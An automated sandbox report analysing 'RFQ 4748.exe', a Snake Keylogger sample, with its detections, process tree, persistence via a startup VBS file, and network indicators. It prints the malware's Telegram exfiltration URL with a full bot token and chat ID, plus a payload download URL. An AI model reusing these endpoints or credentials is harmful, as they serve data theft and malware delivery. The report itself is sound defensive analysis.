Windows Analysis Report
RFQ 4748.exe

Overview

General Information

Sample name: RFQ 4748.exe
Analysis ID: 1551956
MD5: ad61c5c16181fe8ce8fe58ab4bf3d15d
SHA1: 656ccb4712cb709b217da2341e3f6069caebf0fb
SHA256: e7c828d9806cfaaa5251e8dfd14b76835a2e8f661ad392de85c6a93059202f40
Tags: exe, SnakeKeylogger, user-lowmal3
Infos:

Detection

Snake Keylogger
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Yara detected AntiVM3
Yara detected Snake Keylogger
.NET source code contains potential unpacker
AI detected suspicious sample
Drops VBS files to the startup folder
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Sigma detected: WScript or CScript Dropper
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Yara detected Costura Assembly Loader
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • RFQ 4748.exe (PID: 5272 cmdline: "C:\Users\user\Desktop\RFQ 4748.exe" MD5: AD61C5C16181FE8CE8FE58AB4BF3D15D)
    • InstallUtil.exe (PID: 360 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
  • wscript.exe (PID: 3092 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Fallback.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • Fallback.exe (PID: 1096 cmdline: "C:\Users\user\AppData\Roaming\Fallback.exe" MD5: AD61C5C16181FE8CE8FE58AB4BF3D15D)
      • InstallUtil.exe (PID: 3652 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
  • cleanup
Name: 404 Keylogger, Snake Keylogger
Description: Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victim's sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.
Attribution: No Attribution
Blogpost URLs:
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"Exfil Mode": "Telegram", "Telegram URL": "https://api.telegram.org/bot7690586559:AAHjgfU-aDw_iLX-s_ri6LZhjXJ7Pf6Mo9Y/sendMessage?chat_id=6008123474", "Token": "7690586559:AAHjgfU-aDw_iLX-s_ri6LZhjXJ7Pf6Mo9Y", "Chat_id": "6008123474", "Version": "5.1"}
Source | Rule | Description | Author | Strings
00000006.00000002.4492594683.000000000041B000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_SnakeKeylogger | Yara detected Snake Keylogger | Joe Security |
00000006.00000002.4492594683.000000000041B000.00000040.00000400.00020000.00000000.sdmp | MALWARE_Win_SnakeKeylogger | Detects Snake Keylogger | ditekSHen |
  • 0x8b8:$x1: $%SMTPDV$
  • 0x860:$x3: %FTPDV$
  • 0x884:$m2: Clipboard Logs ID
  • 0xac2:$m2: Screenshot Logs ID
  • 0xbd2:$m2: keystroke Logs ID
  • 0xeac:$m3: SnakePW
  • 0xa9a:$m4: \SnakeKeylogger\
00000002.00000002.4492614618.0000000000419000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_SnakeKeylogger | Yara detected Snake Keylogger | Joe Security |
00000000.00000002.2097379487.0000000003EB1000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000000.00000002.2097379487.0000000003EB1000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_SnakeKeylogger | Yara detected Snake Keylogger | Joe Security |

Source | Rule | Description | Author | Strings
0.2.RFQ 4748.exe.6b60000.9.raw.unpack | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security |
5.2.Fallback.exe.438fdb0.1.raw.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
5.2.Fallback.exe.438fdb0.1.raw.unpack | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security |
5.2.Fallback.exe.438fdb0.1.raw.unpack | JoeSecurity_SnakeKeylogger | Yara detected Snake Keylogger | Joe Security |
5.2.Fallback.exe.438fdb0.1.raw.unpack | Windows_Trojan_SnakeKeylogger_af3faa65 | unknown | unknown |
  • 0x14ab7:$a1: get_encryptedPassword
  • 0x14da3:$a2: get_encryptedUsername
  • 0x148c3:$a3: get_timePasswordChanged
  • 0x149be:$a4: get_passwordField
  • 0x14acd:$a5: set_encryptedPassword
  • 0x16161:$a7: get_logins
  • 0x160c4:$a10: KeyLoggerEventArgs
  • 0x15d2f:$a11: KeyLoggerEventArgsEventHandler

                  System Summary

                  Source: Process started, Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community, Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Fallback.vbs", CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Fallback.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Fallback.vbs", ProcessId: 3092, ProcessName: wscript.exe
                  Source: Process started, Author: Michael Haag, Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Fallback.vbs", CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Fallback.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Fallback.vbs", ProcessId: 3092, ProcessName: wscript.exe

                  Data Obfuscation

                  Source: File created, Author: Joe Security, Data: EventID: 11, Image: C:\Users\user\Desktop\RFQ 4748.exe, ProcessId: 5272, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Fallback.vbs
                  Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
                  2024-11-08T11:51:30.265429+0100 | 2022930 | 1 | A Network Trojan was detected | 20.109.210.53 | 443 | 192.168.2.5 | 49716 | TCP
                  2024-11-08T11:52:08.779079+0100 | 2022930 | 1 | A Network Trojan was detected | 20.109.210.53 | 443 | 192.168.2.5 | 49938 | TCP
                  2024-11-08T11:51:20.144257+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.5 | 49707 | 188.114.96.3 | 443 | TCP
                  2024-11-08T11:51:25.754181+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.5 | 49713 | 188.114.96.3 | 443 | TCP
                  2024-11-08T11:51:29.956391+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.5 | 49721 | 188.114.96.3 | 443 | TCP
                  2024-11-08T11:51:39.173813+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.5 | 49771 | 188.114.96.3 | 443 | TCP
                  2024-11-08T11:51:40.805290+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.5 | 49782 | 188.114.96.3 | 443 | TCP
                  2024-11-08T11:51:44.079836+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.5 | 49802 | 188.114.96.3 | 443 | TCP
                  2024-11-08T11:51:18.089032+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49705 | 193.122.6.168 | 80 | TCP
                  2024-11-08T11:51:19.401563+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49705 | 193.122.6.168 | 80 | TCP
                  2024-11-08T11:51:21.339167+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49708 | 193.122.6.168 | 80 | TCP
                  2024-11-08T11:51:37.385956+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49758 | 193.122.6.168 | 80 | TCP
                  2024-11-08T11:51:38.479711+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49758 | 193.122.6.168 | 80 | TCP
                  2024-11-08T11:51:40.089181+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49776 | 193.122.6.168 | 80 | TCP

                  AV Detection

                  Source: RFQ 4748.exe, Avira: detected
                  Source: C:\Users\user\AppData\Roaming\Fallback.exe, Avira: detection malicious, Label: HEUR/AGEN.1309900
                  Source: 00000000.00000002.2097379487.0000000003EB1000.00000004.00000800.00020000.00000000.sdmp, Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Telegram URL": "https://api.telegram.org/bot7690586559:AAHjgfU-aDw_iLX-s_ri6LZhjXJ7Pf6Mo9Y/sendMessage?chat_id=6008123474", "Token": "7690586559:AAHjgfU-aDw_iLX-s_ri6LZhjXJ7Pf6Mo9Y", "Chat_id": "6008123474", "Version": "5.1"}
                  Source: C:\Users\user\AppData\Roaming\Fallback.exe, ReversingLabs: Detection: 31%
                  Source: RFQ 4748.exe, ReversingLabs: Detection: 31%
                  Source: Submitted Sample, Integrated Neural Analysis Model: Matched 100.0% probability
                  Source: C:\Users\user\AppData\Roaming\Fallback.exe, Joe Sandbox ML: detected
                  Source: RFQ 4748.exe, Joe Sandbox ML: detected

                  Location Tracking

                  Source: unknown, DNS query: name: reallyfreegeoip.org
                  Source: RFQ 4748.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: unknown, HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49706 version: TLS 1.0
                  Source: unknown, HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49765 version: TLS 1.0
                  Source: unknown, HTTPS traffic detected: 185.78.221.73:443 -> 192.168.2.5:49704 version: TLS 1.2
                  Source: unknown, HTTPS traffic detected: 185.78.221.73:443 -> 192.168.2.5:49722 version: TLS 1.2
                  Source: RFQ 4748.exe, Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: RFQ 4748.exe, 00000000.00000002.2089151863.00000000031F9000.00000004.00000800.00020000.00000000.sdmp, RFQ 4748.exe, 00000000.00000002.2097379487.0000000003EB1000.00000004.00000800.00020000.00000000.sdmp, RFQ 4748.exe, 00000000.00000002.2097379487.0000000003E38000.00000004.00000800.00020000.00000000.sdmp, RFQ 4748.exe, 00000000.00000002.2105699680.0000000006C60000.00000004.08000000.00040000.00000000.sdmp, Fallback.exe, 00000005.00000002.2303227720.000000000438F000.00000004.00000800.00020000.00000000.sdmp, Fallback.exe, 00000005.00000002.2288151559.0000000003685000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: RFQ 4748.exe, RFQ 4748.exe, 00000000.00000002.2089151863.00000000031F9000.00000004.00000800.00020000.00000000.sdmp, RFQ 4748.exe, 00000000.00000002.2097379487.0000000003EB1000.00000004.00000800.00020000.00000000.sdmp, RFQ 4748.exe, 00000000.00000002.2097379487.0000000003E38000.00000004.00000800.00020000.00000000.sdmp, RFQ 4748.exe, 00000000.00000002.2105699680.0000000006C60000.00000004.08000000.00040000.00000000.sdmp, Fallback.exe, 00000005.00000002.2303227720.000000000438F000.00000004.00000800.00020000.00000000.sdmp, Fallback.exe, 00000005.00000002.2288151559.0000000003685000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: protobuf-net.pdbSHA256}Lq source: RFQ 4748.exe, 00000000.00000002.2105520492.0000000006BC0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: protobuf-net.pdb source: RFQ 4748.exe, 00000000.00000002.2105520492.0000000006BC0000.00000004.08000000.00040000.00000000.sdmp
                  Source: C:\Windows\System32\wscript.exe, File opened: C:\Users\user\AppData\
                  Source: C:\Windows\System32\wscript.exe, File opened: C:\Users\user\AppData\Roaming\Microsoft\
                  Source: C:\Windows\System32\wscript.exe, File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
                  Source: C:\Windows\System32\wscript.exe, File opened: C:\Users\user\
                  Source: C:\Windows\System32\wscript.exe, File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
                  Source: C:\Windows\System32\wscript.exe, File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\

                  Networking

                  Source: Yara match, File source: 5.2.Fallback.exe.438fdb0.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara match, File source: 0.2.RFQ 4748.exe.3f179d0.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara match, File source: 0.2.RFQ 4748.exe.3effdb0.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara match, File source: 0.2.RFQ 4748.exe.3eb1590.5.raw.unpack, type: UNPACKEDPE
                  Source: global traffic, HTTP traffic detected: GET /slim/Knlpdavcfrw.vdf HTTP/1.1 | Host: www.oleonidas.gr | Connection: Keep-Alive
                  Source: global traffic, HTTP traffic detected: GET /xml/173.254.250.90 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
                  Source: global traffic, HTTP traffic detected: GET /xml/173.254.250.90 HTTP/1.1 | Host: reallyfreegeoip.org
                  Source: Joe Sandbox View, IP Address: 193.122.6.168
                  Source: Joe Sandbox View, IP Address: 188.114.96.3
                  Source: Joe Sandbox View, JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                  Source: Joe Sandbox View, JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                  Source: unknown, DNS query: name: checkip.dyndns.org
                  Source: unknown, DNS query: name: reallyfreegeoip.org
                  Source: Network traffic, Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49708 -> 193.122.6.168:80
                  Source: Network traffic, Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49705 -> 193.122.6.168:80
                  Source: Network traffic, Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49758 -> 193.122.6.168:80
                  Source: Network traffic, Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49776 -> 193.122.6.168:80
                  Source: Network traffic, Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49713 -> 188.114.96.3:443
                  Source: Network traffic, Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49721 -> 188.114.96.3:443
                  Source: Network traffic, Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49707 -> 188.114.96.3:443
                  Source: Network traffic, Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49771 -> 188.114.96.3:443
                  Source: Network traffic, Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49782 -> 188.114.96.3:443
                  Source: Network traffic, Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49802 -> 188.114.96.3:443
                  Source: Network traffic, Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.109.210.53:443 -> 192.168.2.5:49938
                  Source: Network traffic, Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.109.210.53:443 -> 192.168.2.5:49716
                  Source: global traffic, HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
                  Source: global traffic, HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
                  Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49706 version: TLS 1.0
                  Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49765 version: TLS 1.0
                  Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: global traffic HTTP traffic detected: GET /slim/Knlpdavcfrw.vdf HTTP/1.1 Host: www.oleonidas.gr Connection: Keep-Alive
                  Source: global traffic HTTP traffic detected: GET /xml/173.254.250.90 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
                  Source: global traffic HTTP traffic detected: GET /xml/173.254.250.90 HTTP/1.1 Host: reallyfreegeoip.org
                  Source: global traffic DNS traffic detected: DNS query: www.oleonidas.gr
                  Source: global traffic DNS traffic detected: DNS query: checkip.dyndns.org
                  Source: global traffic DNS traffic detected: DNS query: reallyfreegeoip.org
                  Source: InstallUtil.exe String found in binary or memory: http://checkip.dyndns.com
                  Source: InstallUtil.exe String found in binary or memory: http://checkip.dyndns.org
                  Source: InstallUtil.exe String found in binary or memory: http://checkip.dyndns.org/
                  Source: RFQ 4748.exe, Fallback.exe, InstallUtil.exe String found in binary or memory: http://checkip.dyndns.org/q
                  Source: InstallUtil.exe String found in binary or memory: http://reallyfreegeoip.org
                  Source: RFQ 4748.exe, InstallUtil.exe, Fallback.exe String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: RFQ 4748.exe String found in binary or memory: https://github.com/mgravell/protobuf-net
                  Source: RFQ 4748.exe String found in binary or memory: https://github.com/mgravell/protobuf-netJ
                  Source: RFQ 4748.exe String found in binary or memory: https://github.com/mgravell/protobuf-neti
                  Source: InstallUtil.exe String found in binary or memory: https://reallyfreegeoip.org
                  Source: RFQ 4748.exe, InstallUtil.exe, Fallback.exe String found in binary or memory: https://reallyfreegeoip.org/xml/
                  Source: InstallUtil.exe String found in binary or memory: https://reallyfreegeoip.org/xml/173.254.250.90
                  Source: InstallUtil.exe String found in binary or memory: https://reallyfreegeoip.org/xml/173.254.250.90$
                  Source: RFQ 4748.exe String found in binary or memory: https://stackoverflow.com/q/11564914/23354;
                  Source: RFQ 4748.exe, Fallback.exe String found in binary or memory: https://stackoverflow.com/q/14436606/23354
                  Source: RFQ 4748.exe String found in binary or memory: https://stackoverflow.com/q/2152978/23354
                  Source: RFQ 4748.exe, Fallback.exe String found in binary or memory: https://www.oleonidas.gr
                  Source: RFQ 4748.exe, Fallback.exe String found in binary or memory: https://www.oleonidas.gr/slim/Knlpdavcfrw.vdf
                  Source: unknown HTTPS traffic detected: 185.78.221.73:443 -> 192.168.2.5:49704 version: TLS 1.2
                  Source: unknown HTTPS traffic detected: 185.78.221.73:443 -> 192.168.2.5:49722 version: TLS 1.2

                  System Summary

                  Source: 5.2.Fallback.exe.438fdb0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 5.2.Fallback.exe.438fdb0.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 5.2.Fallback.exe.438fdb0.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 5.2.Fallback.exe.438fdb0.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects Snake Keylogger Author: ditekSHen
                  Source: 0.2.RFQ 4748.exe.3f179d0.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0.2.RFQ 4748.exe.3f179d0.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 0.2.RFQ 4748.exe.3f179d0.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 0.2.RFQ 4748.exe.3f179d0.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects Snake Keylogger Author: ditekSHen
                  Source: 6.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 6.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects Snake Keylogger Author: ditekSHen
                  Source: 0.2.RFQ 4748.exe.3effdb0.3.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0.2.RFQ 4748.exe.3effdb0.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 0.2.RFQ 4748.exe.3effdb0.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 0.2.RFQ 4748.exe.3effdb0.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects Snake Keylogger Author: ditekSHen
                  Source: 0.2.RFQ 4748.exe.3f179d0.2.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0.2.RFQ 4748.exe.3f179d0.2.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 5.2.Fallback.exe.438fdb0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0.2.RFQ 4748.exe.3f179d0.2.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 5.2.Fallback.exe.438fdb0.1.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 0.2.RFQ 4748.exe.3f179d0.2.unpack, type: UNPACKEDPE Matched rule: Detects Snake Keylogger Author: ditekSHen
                  Source: 5.2.Fallback.exe.438fdb0.1.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 5.2.Fallback.exe.438fdb0.1.unpack, type: UNPACKEDPE Matched rule: Detects Snake Keylogger Author: ditekSHen
                  Source: 0.2.RFQ 4748.exe.3eb1590.5.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0.2.RFQ 4748.exe.3eb1590.5.raw.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 0.2.RFQ 4748.exe.3eb1590.5.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 0.2.RFQ 4748.exe.3eb1590.5.raw.unpack, type: UNPACKEDPE Matched rule: Detects Snake Keylogger Author: ditekSHen
                  Source: 00000006.00000002.4492594683.000000000041B000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects Snake Keylogger Author: ditekSHen
                  Source: 00000000.00000002.2097379487.0000000003EB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 00000000.00000002.2097379487.0000000003EB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects Snake Keylogger Author: ditekSHen
                  Source: 00000005.00000002.2288151559.0000000003719000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects Snake Keylogger Author: ditekSHen
                  Source: 00000005.00000002.2303227720.000000000438F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 00000005.00000002.2303227720.000000000438F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects Snake Keylogger Author: ditekSHen
                  Source: 00000000.00000002.2097379487.0000000003F95000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 00000000.00000002.2097379487.0000000003F95000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects Snake Keylogger Author: ditekSHen
                  Source: 00000005.00000002.2303227720.000000000440D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 00000002.00000002.4492614618.0000000000408000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 00000000.00000002.2089151863.0000000003299000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects Snake Keylogger Author: ditekSHen
                  Source: Process Memory Space: RFQ 4748.exe PID: 5272, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: Process Memory Space: RFQ 4748.exe PID: 5272, type: MEMORYSTR Matched rule: Detects Snake Keylogger Author: ditekSHen
                  Source: Process Memory Space: InstallUtil.exe PID: 360, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: Process Memory Space: Fallback.exe PID: 1096, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: Process Memory Space: Fallback.exe PID: 1096, type: MEMORYSTR Matched rule: Detects Snake Keylogger Author: ditekSHen
                  Source: Process Memory Space: InstallUtil.exe PID: 3652, type: MEMORYSTR Matched rule: Detects Snake Keylogger Author: ditekSHen
                  Source: initial sample Static PE information: Filename: RFQ 4748.exe
                  Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
                  Source: C:\Users\user\Desktop\RFQ 4748.exe Code function: 0_2_06AD8780 NtProtectVirtualMemory
                  Source: C:\Users\user\Desktop\RFQ 4748.exe Code function: 0_2_06AD9BC0 NtResumeThread
                  Source: C:\Users\user\Desktop\RFQ 4748.exe Code function: 0_2_06AD8778 NtProtectVirtualMemory
                  Source: C:\Users\user\Desktop\RFQ 4748.exe Code function: 0_2_06AD9BB8 NtResumeThread
                  Source: C:\Users\user\Desktop\RFQ 4748.exe Code function: 0_2_06AD9B2F NtResumeThread
                  Source: C:\Users\user\AppData\Roaming\Fallback.exe Code function: 5_2_06D98780 NtProtectVirtualMemory
                  Source: C:\Users\user\AppData\Roaming\Fallback.exe Code function: 5_2_06D99BC0 NtResumeThread
                  Source: C:\Users\user\AppData\Roaming\Fallback.exe Code function: 5_2_06D9877B NtProtectVirtualMemory
                  Source: C:\Users\user\AppData\Roaming\Fallback.exe Code function: 5_2_06D99BB8 NtResumeThread
                  Source: C:\Users\user\AppData\Roaming\Fallback.exe Code function: 5_2_06D99B2F NtResumeThread
                  Source: RFQ 4748.exe Binary or memory string: OriginalFilename vs RFQ 4748.exe
                  Source: RFQ 4748.exe, 00000000.00000002.2089151863.00000000031F9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs RFQ 4748.exe
                  Source: RFQ 4748.exe, 00000000.00000002.2097379487.0000000003EB1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs RFQ 4748.exe
